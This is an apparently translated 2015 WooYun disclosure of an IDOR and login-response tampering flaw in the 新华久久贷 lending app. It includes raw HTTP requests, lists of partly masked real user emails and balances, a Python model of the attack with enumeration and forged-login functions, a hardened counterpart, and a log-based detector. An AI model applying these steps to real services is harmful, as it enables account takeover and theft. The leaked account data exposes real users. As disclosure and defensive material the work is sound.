
Vulnerability summary

Defect ID: wooyun-2015-0131872

Title: 新华久久贷 has a major design flaw (puts the funds of every user at risk)

Vendor: 新华久久贷

Author: DloveJ

Submitted: 2015-08-05 16:15

Fix time: 2015-08-10 16:16

Public since: 2015-08-10 16:16

Vulnerability type: design flaw / logic error

Severity: high

Self-assessed Rank: 20

Status: vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-08-05: details sent to the vendor, awaiting vendor action
2015-08-10: vendor actively ignored the vulnerability, details published

Brief description:

account_manage.json returns any user's balances and e-mail address for whatever userId is posted, with no authentication, and the app takes its identity from the login response, which an intercepting proxy can rewrite. Together they let an attacker log in as any user. With this hole, getting rich in minutes would be no dream!! Could I get a taste of the power of 雷?

Detailed description:

Download the app.

S50805-152732.jpg


A normal login shows the app calling this endpoint:

POST /xh99d_api/mobile/account_manage.json HTTP/1.1
Content-Length: 20
Content-Type: application/x-www-form-urlencoded
Host: www.xh99d.com
Connection: close
User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; zh-cn; MX4) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Accept-Encoding: gzip
catalog=1&userId=238


The response:

HTTP/1.1 200 OK
Server: nginx/1.1.19
Date: Wed, 05 Aug 2015 07:17:50 GMT
Content-Type: application/json;charset=UTF-8
Content-Length: 245
Connection: keep-alive
Content-Language: zh-CN
{"code":200,"message":"successful","result":{"allMoney":0.00,"avaiMoney":0.0,"blockMoney":0.0,"incomeMoney":0.00,"payMoney":0.00,"userEmail":"******@163.com","userRealName":""},"resultCode":"200","resultMessage":"Success","success":true}


The request carries no cookie or token, only userId, so iterating over userId returns every user's balances, e-mail address and so on. Enumerating a range:

masked region
*****enan@163.c*****
*****2@163.com*****
*****198@sohu.*****
*****540@qq.co*****
*****uan@sina.*****
*****4977@qq.c*****
*****07773@qq.*****
*****831@qq.co*****
*****5848@qq.c*****
*****0@hotmail.c*****
*****ihua@126.c*****
*****735@qq.com*****
*****6921@qq.c*****
*****7653@qq.c*****
*****673@qq.co*****
*****83@qq.com*****
*****7615@qq.c*****
*****8593@qq.c*****
*****7048@qq.c*****
*****661@qq.com*****
*****78468@qq.*****
*****0705@qq.co*****
*****9700@qq.c*****
*****9559@qq.c*****
*****4984@qq.c*****
*****2083@qq.c*****
*****620@qq.co*****
*****9473@qq.c*****
*****52@qq.com*****
*****guo1974@12*****
*****030@163.co*****
*****g915@126.c*****
*****8351@qq.c*****
*****3122@qq.c*****
*****a@163.com*****
*****8603@qq.C*****
*****3712@qq.c*****
*****9195@qq.c*****
*****080@qq.co*****
*****jun0507@16*****
*****6919@qq.c*****
*****ymm@163.c*****
*****0768@qq.c*****
*****7456@163.c*****
*****6772@qq.c*****
*****2001@163.*****
*****ang@sina.*****
*****2131@qq.c*****
*****6544@qq.c*****
*****@vip.sina.*****
*****1101@163.c*****
*****507@qq.co*****
*****u@live.com*****
*****3698@qq.c*****
*****4619@qq.c*****
*****79336@qq.*****
*****an@163.co*****
*****1168@qq.c*****
*****6907@qq.c*****
*****593@qq.co*****
*****4941@qq.c*****
*****208@163.c*****
*****747@qq.co*****
*****8906@qq.c*****
*****87372@qq.*****
*****8185@qq.c*****
*****4241@qq.c*****
*****3485@qq.c*****
*****@163.com *****
*****764@qq.com*****
*****6194@qq.c*****
*****9221@QQ.C*****
*****0023@qq.c*****
*****nx09@163.c*****
*****51108@qq.*****
*****2943@qq.c*****
*****4917@qq.c*****
*****1020@163.*****
*****g-tina@16*****
*****065@qq.co*****
*****6728@qq.c*****
*****61@qq.com*****
*****47725@qq.*****
*****9956@189.c*****
*****4802@qq.c*****
*****25@sina.c*****
*****76480@qq.*****
*****481@qq.co*****
*****3513@qq.c*****
*****7787@qq.c*****
*****6694@qq.c*****
*****edu@126.co*****
*****5243@qq.c*****
*****41283@qq.*****
*****in222@163*****
*****wd@163.co*****
*****613@hotmail.*****
*****86@sina.co*****
*****406@qq.co*****
*****8493@qq.c*****
*****0746@qq.c*****
*****165@qq.com*****
*****524@qq.co*****
*****19@126.com*****
*****69813@qq.*****
*****ao@126.com*****
*****11844@qq.*****
*****87971@qq.*****
*****9478@qq.c*****
*****hina@126.c*****
*****5919@qq.c*****
*****4196@qq.c*****
*****6@qq.com *****
*****4490@qq.c*****
*****1979@qq.c*****
*****961@163.*****
*****0290@qq.c*****
*****ang@163.co*****
*****60@163.con*****
*****651@qq.co*****
*****1533@qq.c*****
*****27@126.com*****
*****hh@163.co*****
*****1701@qq.c*****
*****688@qq.com*****
*****2516@qq.c*****
*****123@163.c*****
*****1000@qq.c*****
*****2732@qq.c*****
*****4899@qq.c*****
*****625@qq.com*****
*****60426@yeah.*****
*****@126.com *****
*****0551@126.*****
*****3971@qq.c*****
*****35067@qq.*****
*****1922@qq.c*****
*****9641@qq.c*****
*****502@qq.com*****
*****0051@qq.c*****
*****dj@163.co*****
*****2016@qq.c*****
*****10275@qq.*****
*****2297@qq.c*****
*****2058@qq.c*****
*****3527@qq.c*****
*****n128@163.*****
*****1580@qq.c*****
*****527@qq.co*****
*****8168@qq.c*****
*****9760@qq.c*****
*****989@qq.co*****
*****@126.com *****
*****7718@qq.c*****
*****8719@qq.c*****
*****9314@163.c*****
*****dboy@126.*****
*****97@163.com*****
*****784@qq.co*****
*****26@163.com*****
*****304@qq.co*****
*****3889@qq.c*****
*****gjun@163.c*****
*****476@qq.co*****
*****1381@qq.c*****
*****42598@qq.*****
*****96@qq.com*****
*****6384@qq.c*****
*****88@163.co*****
*****52723@qq.*****
*****7393@qq.c*****
*****1011@qq.c*****
*****369@qq.com*****
*****79382@qq.*****
*****8967@qq.c*****
*****6763@qq.c*****
*****ju@hotmail*****
*****611@163.c*****
*****9492@qq.c*****
*****8790@qq.c*****
*****70794@qq.*****
*****66@sina.c*****
*****44865@qq.*****
*****8237@qq.c*****
*****2720@qq.c*****
*****864@qq.co*****
*****4470@qq.c*****
*****0553@qq.c*****
*****203@qq.co*****
*****860@qq.co*****
*****1946@qq.c*****
*****325@qq.co*****
*****359@qq.com*****
*****9186@qq.c*****
*****2880@qq.c*****
*****1758@qq.c*****
*****959@qq.com*****
*****4367@qq.c*****
*****6528@qq.c*****
*****4864@qq.c*****
*****6588@qq.c*****
*****8092@qq.c*****
*****954@qq.co*****
*****g0419@163.c*****
*****133@qq.com*****
*****1570@qq.c*****
*****98@163.com*****
*****@163.com *****
*****3956@qq.c*****
*****x@126.com*****
*****400@qq.co*****
*****9816@qq.c*****
*****097@qq.com*****
*****67@126.c*****
*****9648@qq.c*****
*****7772@qq.co*****
*****023@qq.co*****
*****403@qq.co*****
*****823@qq.co*****
*****590@qq.co*****
*****0223@qq.c*****
*****g_vip@126.*****
*****9674@qq.c*****
*****7510@qq.c*****
*****2107@qq.c*****
*****543@qq.com*****
*****8603@126.co*****
*****57282@qq.*****
*****1919@qq.c*****
*****7546@qq.c*****
*****964@qq.co*****
*****g2001@126.*****
*****z@163.com*****
*****3195@qq.c*****
*****1726@qq.c*****
*****7759@qq.c*****
*****alv@126.c*****
*****4456@qq.c*****
*****0281@qq.c*****
*****1923@qq.c*****
*****45611@163.c*****
*****ing@126.c*****
*****1643@qq.c*****
*****1618@qq.c*****
*****9401@qq.c*****
*****z@sina.cn*****
*****48106@qq.*****
*****5769@qq.c*****
*****4258@qq.c*****
*****681761@13*****
*****634@qq.co*****
*****24@qq.com *****
*****497@qq.co*****
*****1732@qq.c*****
*****726@163.co*****
*****6769@139.c*****
*****5239@qq.c*****
*****8@163.com*****
*****4@163.com*****
*****7183@qq.c*****
*****4049@qq.c*****
*****888@163.c*****
*****zq@sohu.*****
*****112920@16*****
*****9713@qq.c*****
*****46605@qq.*****
*****hsbank.com*****
*****7110@qq.c*****
*****0909@qq.c*****
*****1431@qq.c*****
*****70135@qq.*****
*****6@126.com *****
*****29@qq.com*****
*****99@qq.com*****
*****4807@qq.c*****
*****90491@qq.*****
*****77718@QQ*****


================= Dlove's divider J ========================================
That turned up a pile of accounts. Next I wondered whether arbitrary-user login was possible as well. It was:

2.jpg


Enter any username and password, and capture the login request at the proxy.

3.jpg


Replace the server's response with:

HTTP/1.1 200 OK
Server: nginx/1.1.19
Date: Wed, 05 Aug 2015 07:38:01 GMT
Content-Type: application/json;charset=UTF-8
Content-Length: 112
Connection: keep-alive
Content-Language: zh-CN
{"code":200,"message":"successful","result":{"emailValidFlag":1,"isOpenAccount":"0","phoneValidFlag":1,"userDocNo":"","userEmail":"dondsda@163.com","userHeadImg":"","userId":630,"userName":"yxtest","userPhone":"1511111199","userRealName":"","userType":1},"resultCode":"200","resultMessage":"{UŸ","success":true}


Only userId needs to be changed; the app refreshes the other fields from the server after login, using that userId.
Pick one of the userIds enumerated earlier; let's try a wealthy one.
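The two behaviours above, the endpoint honouring any posted userId and the app taking its identity from the login response, modelled in Python as an added example (not code from the report or from 新华久久贷), next to a hardened counterpart that derives identity only from a server-issued session token. The user table, passwords, balances, second user and token scheme are constructed for the example; only userId 630 / yxtest and the endpoint's field names come from the report.

```python
import hmac
import secrets

# Constructed sample user table standing in for the xh99d database.
# userId 630 / yxtest is the account from the forged login response in the
# report; balances, passwords and the second user are made up.
USERS = {
    238: {"userName": "alice",  "password": "pw-238",
          "userEmail": "a****@163.com",   "allMoney": 0.00,       "avaiMoney": 0.00},
    630: {"userName": "yxtest", "password": "pw-630",
          "userEmail": "dondsda@163.com", "allMoney": 1000000.00, "avaiMoney": 250000.00},
}

def _find_user(user_name, password):
    """Return the userId whose credentials match, else None."""
    for uid, rec in USERS.items():
        if rec["userName"] == user_name and hmac.compare_digest(rec["password"], password):
            return uid
    return None

def _account_result(uid):
    rec = USERS[uid]
    return {"code": 200, "result": {"allMoney": rec["allMoney"],
                                    "avaiMoney": rec["avaiMoney"],
                                    "userEmail": rec["userEmail"]}}

class VulnerableServer:
    """Behaviour the report describes: login puts the identity in the JSON body,
    and account_manage.json trusts whatever userId the client posts."""
    def login(self, user_name, password):
        uid = _find_user(user_name, password)
        if uid is None:
            return {"code": 401, "message": "bad credentials"}
        return {"code": 200, "result": {"userId": uid, "userName": user_name}}

    def account_manage(self, form, token=None):
        # No session check at all: the captured request carries only
        # catalog=1&userId=N, and that userId is looked up directly.
        uid = int(form["userId"])
        if uid not in USERS:
            return {"code": 404, "message": "no such user"}
        return _account_result(uid)

class HardenedServer:
    """Identity comes only from a server-issued session token; the posted
    userId is ignored, so neither enumeration nor a forged login reply works."""
    def __init__(self):
        self.sessions = {}  # token -> userId, kept server side only

    def login(self, user_name, password):
        uid = _find_user(user_name, password)
        if uid is None:
            return {"code": 401, "message": "bad credentials"}
        token = secrets.token_hex(16)
        self.sessions[token] = uid
        return {"code": 200, "result": {"token": token}}

    def account_manage(self, form, token=None):
        uid = self.sessions.get(token)
        if uid is None:
            return {"code": 401, "message": "not authenticated"}
        return _account_result(uid)  # form["userId"] deliberately unused

class App:
    """Minimal model of the mobile client. `proxy` stands for an intercepting
    proxy that can rewrite the login response before the app sees it."""
    def __init__(self, server):
        self.server, self.user_id, self.token = server, None, None

    def login(self, user_name, password, proxy=None):
        resp = self.server.login(user_name, password)
        if proxy is not None:
            resp = proxy(resp)
        if resp.get("code") != 200:
            return False
        # The app takes its identity from whatever the response body says.
        self.user_id = resp["result"].get("userId")
        self.token = resp["result"].get("token")
        return True

    def balance(self):
        form = {"catalog": "1", "userId": str(self.user_id)}
        return self.server.account_manage(form, token=self.token)

def forge_login_response(resp):
    """What the report did in the proxy: replace the reply with a success body
    naming userId 630, whatever credentials were submitted. The token value is
    a guess an attacker might try against the hardened server."""
    return {"code": 200, "result": {"userId": 630, "userName": "yxtest", "token": "forged"}}

def enumerate_accounts(server, id_range, token=None):
    """Walk userId values the way the report did; returns the ids that leaked."""
    leaked = {}
    for uid in id_range:
        r = server.account_manage({"catalog": "1", "userId": str(uid)}, token=token)
        if r.get("code") == 200:
            leaked[uid] = r["result"]["userEmail"]
    return leaked
```

Against `VulnerableServer`, a login with wrong credentials plus `forge_login_response` ends with the app reading userId 630's balance, and `enumerate_accounts` over an id range leaks every account. Against `HardenedServer` the forged reply leaves the app with a token the server never issued, so the next request gets 401, and a caller with a valid token who posts someone else's userId still gets only their own data.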

S50805-152659.jpg

S50805-154324.jpg

S50805-154417.jpg

S50805-154557.jpg

S50805-154605.jpg

S50805-154728.jpg


The screenshots show the quick-withdrawal balance. Checking accounts one at a time is too slow, though; the same endpoint returns a user's e-mail, total balance and withdrawable balance directly:

POST /xh99d_api/mobile/account_manage.json HTTP/1.1
Content-Length: 18
Content-Type: application/x-www-form-urlencoded
Host: www.xh99d.com
Connection: close
User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; zh-cn; MX4) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Accept-Encoding: gzip
catalog=1&userId=5


Again, just iterate over userId.

4.jpg


masked region
*****57266.36	152*****
*****5316.25 8865*****
*****104966.68 29*****
*****446.03 139056*****
*****52578.33 761*****
*****47642.75 wi*****
*****040.33 1983*****
*****17217.32 1193*****
*****40281.11 410*****
*****18973.09 996*****
*****957.18 qianme*****
*****40281.11 286*****
*****130.66 46509*****
*****113.34 41910*****
*****5201.67 474*****
***** 95397.72 62*****
*****8141.89 xuli*****
*****4826.17 2045*****
*****145.98 50643*****
*****3158.71 shan*****
*****85184.43 75*****
*****444126.73 45*****
*****0536.66 7142*****
*****31640.04 364*****
*****5201.67 924*****
*****6321.92 hubi*****
*****30344.06 343*****
*****0980.00 5240*****
*****0980.00 5638*****
*****3098.00 694*****
*****27964.92 349*****
*****5201.67 676*****
*****8565.35 3814*****
*****03418.06 290*****
*****9 1013.97 l*****
*****437.90 78006*****
*****21700.74 192*****
*****92395.02 wxd*****
*****120.99 80583*****
*****03 0.00 5760*****
*****423977.30 ch*****
***** 0.00 yuanl*****
*****2016.67 zhan*****
*****.00 zhangwendy*****
*****16215.05 983*****
*****1210.00 1204*****
*****316.64 36341*****
*****105705.38 ta*****
*****1210.00 haol*****
***** 2014.06 23*****
***** 201405.56 1*****
***** 71121.67 2*****
*****5 0.00 fyy9*****
*****753.83 guofei*****
*****551.10 19219*****
*****5484.93 4046*****
*****201.41 9421*****
*****158633.37 la*****
*****2184.70 409*****
***** 157670.02 2*****
*****7176.00 6570*****
*****201.67 fight*****
*****2683.34 1019*****
***** 295703.60 *****
***** 362777.85 6*****
*****7163.36 satan*****
*****0.00 jinhu0*****
*****3284.31 gufen*****
*****49775.13 158*****
*****383916.68 lu*****
*****1648.00 834*****
***** 588260.17 39*****
*****5 75570.31 l*****
*****54617.78 747*****
*****526.84 3700*****
*****416454.45 c*****
*****2 0.00 13391*****
*****41613.33 251*****
*****1957.86 3954*****
*****052.04 zqf91*****
*****6334.00 116*****
*****21331.57 348*****
*****121708.32 14*****
*****21778.60 757*****
*****5393.90 yuen*****
*****73670.28 447*****
*****813.07 liushu*****
*****110.02 lm3761*****
*****52685.05 543*****
*****58001.68 bzl*****
*****595135.35 304*****
*****76205.14 zs-*****
*****92673.00 773*****
*****10070.28 590*****
*****10070.28 417*****
***** 103078.42 9*****
*****0653.32 4000*****
*****0653.34 4594*****
*****6066.66 6734*****
*****0.00 838269*****
*****35999.99 yue*****
*****14.90 87676*****
*****100.70 1050*****
*****100.70 4749*****
*****.85 qikedong*****
*****100.70 2127*****
*****23061.17 715*****
*****632.50 hfniug*****
*****10326.66 115*****
*****156050.00 60*****
*****8.10 huangyig*****
*****144.37 67433*****
*****562.00 29043*****
***** 104033.33 1*****
*****10403.33 kkl*****
*****8489.43 4228*****
*****luyan0@hsbank.co*****
*****03.33 luyan0@*****
*****04137.36 1396*****
*****1557.93 1062*****
*****314.91 1205*****
*****544933.98 wuy*****
*****7 0.00 7579*****
*****20977.37 121*****
*****1073.34 5142*****
*****095.99 lu229*****
*****31680.00 798*****
*****3 502037.90 1*****
*****9.60 chenhui*****
*****289.31 lacy0*****
***** 65371.36 ky*****
***** 72927.37 15*****
*****3 96546.68 1*****
*****291.68 35398*****
***** 620.87 281*****
***** 50351.39 12*****
***** 50351.39 46*****
***** 50351.39 16*****
*****5035.14 5474*****
***** 51633.34 lx*****
***** 165971.23 6*****
*****181.66 xiaobai*****
*****5293.18 245*****
*****12.21 heting*****
*****4.03 1385511*****
*****523.24 6178*****
*****23.24 70938*****
*****853.06 30635*****
*****018.65 51049*****
*****0.00 449300*****
*****9886.26 7181*****
*****0.00 329383*****
*****11.14 14524*****
*****5.36 1832668*****
*****957.38 35110*****
*****9749.13 1089*****
*****11.21 35779*****
*****468.43 17294*****
*****105.42 ghtz*****
*****7917.72 4994*****
*****621.67 31278*****
*****8557.51 3297*****
*****683.34 42563*****
*****0.00 737726*****
*****941.50 lhy20*****
***** 0.00 5988*****
*****4639.08 1985*****
*****2.01 jincong*****
*****965258.29 y*****
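A server-side detection for the enumeration above, as an added example that is not part of the report: walking userId values leaves one source address requesting account_manage.json for many different userId values in a short window. It assumes an nginx log_format that appends $request_body to the usual fields (nginx only fills $request_body once the body has been read, for example under proxy_pass); the log lines are constructed here, and the threshold of 20 distinct userId values in 60 seconds is a starting point to tune, not a figure from the report.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from urllib.parse import parse_qs

# Assumed log_format: '$remote_addr [$time_local] "$request" $status "$request_body"'
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) "(?P<body>[^"]*)"$'
)
TARGET = "/xh99d_api/mobile/account_manage.json"

def parse_line(line):
    """Return (ip, timestamp, userId, status) for an account_manage hit, else None."""
    m = LOG_RE.match(line)
    if m is None or m["path"] != TARGET:
        return None
    uid = parse_qs(m["body"]).get("userId", [None])[0]
    if uid is None:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, uid, int(m["status"])

def detect_enumeration(lines, window_seconds=60, threshold=20):
    """Flag sources that request `threshold` or more distinct userId values
    within any `window_seconds` span. Returns {ip: peak distinct count}.
    Lines are assumed chronological per source, as a log file is."""
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)   # ip -> deque of (timestamp, userId)
    peak = defaultdict(int)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, uid, _status = rec     # 404s count too: a scan hits gaps
        q = recent[ip]
        q.append((ts, uid))
        while q and ts - q[0][0] > window:
            q.popleft()
        distinct = len({u for _, u in q})
        if distinct > peak[ip]:
            peak[ip] = distinct
    return {ip: n for ip, n in peak.items() if n >= threshold}

def _line(ip, second, uid, status=200):
    """Build one constructed log line in the assumed format."""
    return (f'{ip} [05/Aug/2015:15:17:{second:02d} +0800] '
            f'"POST {TARGET} HTTP/1.1" {status} "catalog=1&userId={uid}"')

# Constructed sample log: one scanner, one legitimate user, one low-volume source.
SAMPLE_LOG = (
    [_line("10.0.0.7", s, 100 + s) for s in range(0, 40)]       # walks 40 ids in 40 s
    + [_line("10.0.0.9", s, 238) for s in range(0, 50, 5)]      # refreshes own balance
    + [_line("10.0.0.11", s, 500 + s) for s in range(0, 5)]     # 5 ids, under threshold
)

if __name__ == "__main__":
    print(detect_enumeration(SAMPLE_LOG))
```

A legitimate user polls a single userId, so the distinct count stays at 1 however often the app refreshes; only the scanner crosses the threshold. Once the endpoint is fixed to ignore the posted userId, the same rule still catches probing, since a scan produces the same traffic shape whether or not it succeeds.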


This time the target is locked: straight for the richest account.

5.jpg


This one, with 10 million, it is. Try logging in:

1.jpg


=======================
I did not click Confirm. Not inviting a knock on the door from the police!!
=======================

Proof of vulnerability:

Fix:

You surely know: resolve userId from the authenticated caller's server-side session rather than from the userId parameter in the request body, and have the app rely on a server-issued session token rather than on fields in the login response.

Copyright notice: when reposting, credit the source DloveJ@乌云


Vulnerability response

Vendor response:

Severity: no impact (vendor ignored)

Ignored on: 2015-08-10 16:16

Vendor comment:

Vulnerability Rank: 15 (WooYun rating)

Latest status:

None